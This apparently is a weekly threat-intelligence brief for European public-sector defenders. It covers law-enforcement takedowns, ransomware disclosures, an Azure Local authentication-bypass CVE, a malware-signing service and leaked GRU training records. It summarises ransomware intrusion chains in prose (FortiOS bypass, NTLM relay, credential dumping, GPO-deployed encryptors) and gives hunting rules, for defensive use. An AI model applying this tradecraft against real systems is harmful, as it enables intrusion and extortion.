Operation Saffron: First VPN criminal anonymisation service dismantled; Switzerland JIT participant; Phobos RaaS link confirmed

A coordinated international law enforcement action on 2026-05-19–20 took down First VPN, a Russian-language criminal anonymisation service established in 2014 and systematically marketed on cybercrime forums as a no-log, law-enforcement-resistant tool (Eurojust, 2026-05-21). Europol stated the service "appeared in almost every major cybercrime investigation the agency supported" (BleepingComputer, 2026-05-21). Led by French and Dutch investigators through a Eurojust joint investigation team established in November 2023, the operation seized more than 33 servers distributed across 27 countries (server-host count); 16 nations participated through Europol's Joint Cybercrime Action Taskforce; 7 nations sat on the Eurojust-led JIT, including Switzerland, France, Netherlands, Luxembourg, Romania, Ukraine, and the UK — signalling fedpol/GovCERT.ch operational involvement. Law enforcement arrested the administrator in Ukraine, captured the full user database (over 5,000 accounts) and cryptographic connection records, and generated 83 intelligence packages covering 506 users distributed to partner agencies; Help Net Security reporting confirms the captured data links to the Phobos ransomware-as-a-service operation and broader ransomware, fraud, and data theft investigations (Help Net Security, 2026-05-21). The primary domains (1vpns.com, 1vpns.net, 1vpns.org) and associated .onion mirrors were seized. Historical network flows to those domains in proxy or firewall logs now constitute potential investigative leads flowing through Europol sharing channels; Phobos affiliates have repeatedly targeted EU public-sector and healthcare organisations.

UPDATE (originally covered 2026-W21): West Pharmaceutical Services (NYSE: WST) filed an 8-K/A amendment under SEC Item 1.05 on 2026-05-20 confirming full operational restoration across all manufacturing, supply chain, and commercial sites globally after the May 4 ransomware intrusion (SEC EDGAR 8-K/A, 2026-05-20). No unauthorized activity observed since 2026-05-05. Data exfiltration scope and threat actor attribution remain under investigation; Palo Alto Networks Unit 42 is conducting the forensic response. The 8-K/A marks formal closure of the containment phase under the SEC's mandatory cyber-incident disclosure cycle; data impact scope will require a further disclosure when the investigation concludes.

Microsoft assigned CVE-2026-42822 (CVSS 3.1 = 10.0, CWE-287 Improper Authentication, vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) to an authentication-bypass flaw in Azure Local Disconnected Operations (ALDO) — Microsoft's solution for running Azure services in air-gapped or partially-disconnected infrastructure environments — that allows an unauthorised network attacker to elevate privileges over a network with no credentials and no prior foothold (Microsoft MSRC, 2026-05-18). MSRC rates "Exploitation More Likely"; no in-the-wild exploitation observed and no public PoC at advisory release. Cloud-managed Azure customers using Microsoft-operated Resource Manager environments are already protected — only manually-operated air-gapped Azure Local stacks need action. Remediation requires upgrading ALDO to version 2604 or later via the standard ALDO update channel. Defender takeaway: EU public-sector operators running Azure Local for data-sovereignty / federal data-residency compliance (a common pattern in Bundesverwaltung and German Bundesbehörden environments) should treat this as a Patch-Tuesday-class emergency on disconnected infrastructure where update cadence is typically slower than cloud-managed Azure. Restrict the ALDO management plane to admin-only OOB subnets until v2604 is installed.

Microsoft Threat Intelligence published a detailed exposure of "Fox Tempest" on 2026-05-19, concurrent with the Microsoft Digital Crimes Unit unsealing a U.S. District Court (SDNY) civil action and seizing the signspace[.]cloud infrastructure (The Record, 2026-05-19). The actor operated a malware-signing-as-a-service (MSaaS) since at least May 2025, abusing Microsoft Artifact Signing (formerly Azure Trusted Signing) to mint short-lived (72-hour) code-signing certificates tied to stolen US and Canadian identities (Microsoft Threat Intelligence). Customers uploaded malicious binaries — masquerading as AnyDesk, Teams, PuTTY, Webex — and received Microsoft-signed executables that bypassed AV/EDR signing checks. Microsoft's write-up details the service's commercialisation: short-lived signing certificates sold to ransomware affiliates per signing run, with infrastructure transitioning in February 2026 to VM-based delivery on Cloudzy-hosted hosts that accepted customer binaries and returned signed outputs.

Confirmed downstream customers: Vanilla Tempest (deploying Rhysida ransomware via Microsoft-signed MSTeamsSetup.exe carrying the Oyster/Broomstick backdoor), Storm-0501, Storm-2561, Storm-0249, and ransomware families Rhysida, INC, Qilin, Akira, plus commodity loaders Oyster, Lumma Stealer, and Vidar. Microsoft revoked 1,000+ fraudulent code-signing certificates, disabled hundreds of Cloudzy-hosted VMs that Fox Tempest used as its delivery surface, and rolled identity-validation controls into Artifact Signing. Microsoft's blog notes confirmed affected sectors include healthcare, education, government, and financial services across the US, France, India, and China.

Why it matters to us: European public-sector and healthcare organisations are explicit downstream victims of the affiliates Fox Tempest serviced (Rhysida, Qilin, Akira have all hit EU targets). Hunt for Microsoft-signed PE binaries with certificate validity ≤72 hours issued by "Trusted Signing" intermediaries after 2025-05-01 where the signing CN does not match a known organisational EV entity. Where Teams.exe / AnyDesk.exe / PuTTY / Webex installers spawn cmd.exe / powershell.exe / rundll32 / regsvr32 without the expected Microsoft installer ancestry (Sysmon EID 1 with parent-image filter), treat as Oyster/Broomstick suspect. Restrict Artifact Signing tenant creation; require phishing-resistant MFA + compliant device for Azure subscription management; alert in Defender for Cloud Apps on rapid certificate creation from newly enrolled tenants (Add-AzKeyVaultCertificate).

INTERPOL announced on 2026-05-18 the completion of Operation Ramz — described as the first cyber operation of its scale coordinated by INTERPOL specifically targeting the MENA region — running October 2025 through 2026-02-28 across 13 countries (Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, UAE) (INTERPOL, 2026-05-18; The Hacker News, 2026-05-18; Help Net Security, 2026-05-18). Outcomes: 201 arrests, 382 further suspects identified, 3,867 victims, 53 servers seized, ~8,000 intelligence data points disseminated. Algerian authorities dismantled a phishing-as-a-service operation, seizing a server, computer and hard drives containing phishing software and scripts. Moroccan police seized devices with banking data and phishing tooling; Omani investigators identified a residential server with active malware infection. Jordanian police rescued 15 human-trafficking victims who had been coerced into running cybercrime operations — the same forced-labour-to-cyber-scam pipeline documented in Southeast Asian fraud compounds. Industry partners: Group-IB, Kaspersky, Shadowserver Foundation, Team Cymru, TrendAI. The operation is partially funded by the EU and Council of Europe under the CyberSouth+ project.

Why it matters to us: MENA-based PhaaS kits routinely target EU banking customers and EU payment rails (SEPA-Inst flagging, IBAN-based phishing lures); the disruption reduces commodity-kit availability and the Shadowserver / Group-IB intelligence shared via the operation will surface in NCSC / BSI / NCSC-CH advisories over the coming weeks. The trafficking-to-scam pipeline confirmed in Jordan is the same operator model EUROPOL has been mapping for fraud-compound disruption.

As of 2026-05-14, Check Point published full analysis of the leaked 16.22 GB "Rocket" database. Administrator zeta88 announced a communications-infrastructure overhaul (new Tor addresses, new affiliate channels) rather than shutdown — the operator is actively hardening against exposure rather than exiting. Bedrock Safeguard's decryptor covered the pre-patch binary; the operator has claimed to patch the binary. Continued victim activity is expected. No new victim disclosures or Tor-address confirmations surfaced in W21 research; watch for new DLS address announcement.

Europol launched the EU Anti-Scam Platform (~29 April 2026) at the European Anti-Financial Crime Summit. The platform produces weekly law-enforcement-only briefings (via SIENA) covering prevalent fraud types, financial losses, victim demographics, scammer TTPs, and transaction footprints. Swiss fedpol and KOBIK have Europol liaison access via bilateral agreements; financial intelligence outputs may feed into MROS/AMLA channels. Swiss financial sector entities under AMLA supervision should note this as an emerging source of new suspicious-transaction-report typologies. [SINGLE-SOURCE]

Following the 2026-05-04 Rocket backend DB leak (attributed to a breach of hosting provider 4VPS), administrator zeta88 / hastalamuerte announced a full communications-infrastructure overhaul — new NAS deployment and new locker upgrades — signalling no intent to cease operations. The operation maintained ~332 victims in H1 2026, ranking second in global RaaS activity per Check Point Research. Check Point documented initial access via CVE-2024-55591 (FortiOS management interface auth bypass, ITW since November 2024) and CVE-2025-32433 (Erlang SSH in Cisco context); post-access chain includes RelayKing-based NTLM relay (CVE-2025-33073), AD enumeration, EDR disablement, and GPO-deployed locker (Check Point Research; Check Point blog; daily 2026-05-14 UPDATE).

Bedrock Safeguard (Canadian security firm) published a working decryptor on 2026-05-14 exploiting Go's failure to zero XChaCha20 / X25519 ephemeral private-key material from goroutine stacks post-use; 35/35 files decrypted in testing. The operator claims to have patched the binary, so the decryptor capability is best-case retrospective; affiliates show no evidence of forking, and the core nine-person structure remains intact per leaked chats (Bedrock Safeguard decryptor). Defender takeaway: for any Gentlemen-impacted Go-binary host, attempt process-memory dump capture for ephemeral key recovery before reimaging; verify FortiOS patch state on CVE-2024-55591 across every Swiss / EU public-sector Fortinet deployment (the FortiOS bug is the documented initial-access primary, and the W19 long-running record already lists this CVE).

West Pharmaceutical Services Inc. (NYSE: WST), a US-headquartered global manufacturer of drug-delivery and packaging components, filed a Form 8-K on 2026-05-11 disclosing a material cybersecurity incident under Item 1.05 (SEC EDGAR — WST 8-K, 2026-05-11). The filing states that detection occurred on May 4 2026, materiality was determined May 7, and that "certain data was exfiltrated by an unauthorized party and certain systems were encrypted" — terminology consistent with a T1486 Data Encrypted for Impact plus T1041 Exfiltration Over C2 Channel double-extortion ransomware pattern. The company took global systems offline, activated incident response, notified law enforcement and engaged external forensics; core enterprise systems are restored, shipping/receiving/manufacturing are partially restarted at some facilities, and full restoration timeline and material financial impact remain undetermined. No threat actor has claimed responsibility publicly at time of filing.

Defender takeaway: A double-extortion event against an OT-adjacent pharmaceutical packaging manufacturer is a high-supply-chain-risk template — West Pharma's elastomeric closures, vials and drug-delivery devices feed European biopharma packaging lines including those of national-formulary suppliers. EU public-sector procurement teams handling pharmaceutical resilience plans should validate continuity-of-supply with downstream vendors that source closures or delivery devices from West. Detection pivot for analogous targets: large-volume SMB enumeration, VSSAdmin / WBEM shadow-copy deletion (T1490 Inhibit System Recovery), and abnormal DLP egress volume in the days preceding encryption — the encryption event is rarely the first indicator if logs are retained.

For any NIS2 / KRITIS-DachG / CER essential-entity SOC: measure SIEM / XDR coverage by hostname inventory rather than by sensor-licence count. The South Staffordshire 5% finding is what the ICO judged as inadequate for a water OES; with NIS2 transposition in force across the EU and KRITIS-DachG live in Germany, regulators are now armed with a concrete UK precedent for what "proportionate technical measures" failure looks like in court. Practical first step: pull a list of every Active Directory–joined host from AD; cross-reference against the EDR / SIEM source list; flag the delta. The delta is what the ICO would call the gap.

W1 horizon research identified an in-window operator gap the daily briefs missed. "The Gentlemen" emerged in August 2025 and per ZeroFox surged to the second- or third-most-active ransomware operation globally in Q1 2026 — 192 attacks that quarter, a approximately 448% QoQ increase, 32% of Q1 2026 victims in Europe (up from 2% in Q4 2025) (ZeroFox Q1 2026 Wrap-Up, 2026-04-17). Check Point Research's DFIR report on the operator confirms the post-compromise tradecraft observed during a single incident-response engagement: Cobalt Strike delivered via RPC from a Domain Controller; Mimikatz for credential harvesting; GPO abuse to inject a scheduled task into Group Policy that propagates the encryptor to all domain-joined systems near-simultaneously (compressing time-to-encryption to minimise IR response window); SystemBC SOCKS5 C2 tunnelling and covert payload staging; encryption using X25519 Diffie–Hellman key exchange per file combined with XChaCha20 stream cipher, per-file ephemeral key pair with a random 32-byte private key (Check Point Research DFIR Report, 2026-04-20 · BleepingComputer — The Gentlemen + SystemBC, 2026-04-20). CPR explicitly states the precise initial-access vector could not be conclusively determined for the engagement it analysed; broader reporting attributes initial access to a FortiOS / FortiProxy attack surface that includes CVE-2024-55591 (authentication bypass, CVSS 9.8 — patched January 2025), with secondary reporting describing an operator database of pre-exploited devices and brute-forced VPN credentials primed for deployment — defenders should treat patch-state-alone as insufficient if the device was unpatched against CVE-2024-55591 at any point during the exposure window.

European victims surfaced in BleepingComputer's SystemBC coverage and in quarterly leak-site aggregation include Oltenia Energy Complex (Romania — described as a significant portion of national electricity supply, December 2025) and The Adaptavist Group; Comparitech's Q1 2026 healthcare roundup attributes 10 healthcare-sector claims to the operator in the quarter; the operator's leak-site footprint and the absence of an "off-limits" sector convention make hospitals, water utilities, and similar critical-infrastructure targets in-scope. The cross-finding with this week's other concerns: GPO-injected scheduled-task propagation defeats backup-isolation defences if the AD environment is in the encryption path; if the operator's initial-access funnel includes unpatched FortiGate devices, that surface intersects directly with the Polish water-OT NIS2 coverage-gap framing (§ 4, § 6) since small municipal CI operators are over-represented in the unpatched-FortiGate population. Defender priorities for 2026-W20: hunt scheduled tasks in SYSVOL pointing to UNC paths or temp directories; profile SystemBC SOCKS5 beacons; add XChaCha20 file-header pattern detection at backup / DLP tier; re-verify FortiGate patch state against CVE-2024-55591 and any later FortiOS / FortiProxy auth-bypass advisories.

A six-publisher investigative consortium (The Insider, The Guardian, Le Monde, Der Spiegel, VSquare, Frontstory) published more than 2 000 leaked internal documents from Bauman Moscow State Technical University on 2026-05-07 detailing a structured GRU recruitment-and-training pipeline operating under the cover of "Department No. 4 — Special Training" (Meduza (English), 2026-05-07 · The Guardian, 2026-05-07 · Le Monde, 2026-05-07 · Der Spiegel, 2026-05-07 · heise online, 2026-05-07). Each year 10–15 graduates are placed directly into Russian military intelligence units. The 144-hour core curriculum, labelled in the documents "Countering Technical Intelligence", covers password attacks, CVE-driven exploitation using Metasploit against US DoD network architectures by name, custom trojan development, DDoS methodologies, penetration testing against Western targets, computer-virus construction, and propaganda/manipulation training. Candidates are physically assessed at a mandatory training camp; each placement requires explicit GRU approval.

The leaked assignment records explicitly link graduates to GRU Unit 74455 (Sandworm / VoodooBear — responsible for the 2015–2016 Ukraine power-grid attacks, 2017 NotPetya global wiper, and 2023 Kyivstar telecom outage) and to APT28 (Fancy Bear — responsible for the 2016 Bundestag hack and the 2017 Macron campaign breach, with continuing 2025–2026 activity against EU government and election-adjacent targets). For European defenders the salient operational point is that the curriculum trains specifically against Western and US-DoD topologies — meaning the training pipeline is producing operators whose default mental model of a target network is a NATO-aligned environment, not a generic enterprise. The investigation does not change short-term defensive priorities but reframes the long-running attribution debate: GRU cyber units are not ad-hoc-recruited contractors, they are graduates of a structured technical-intelligence training stream with measurable annual throughput.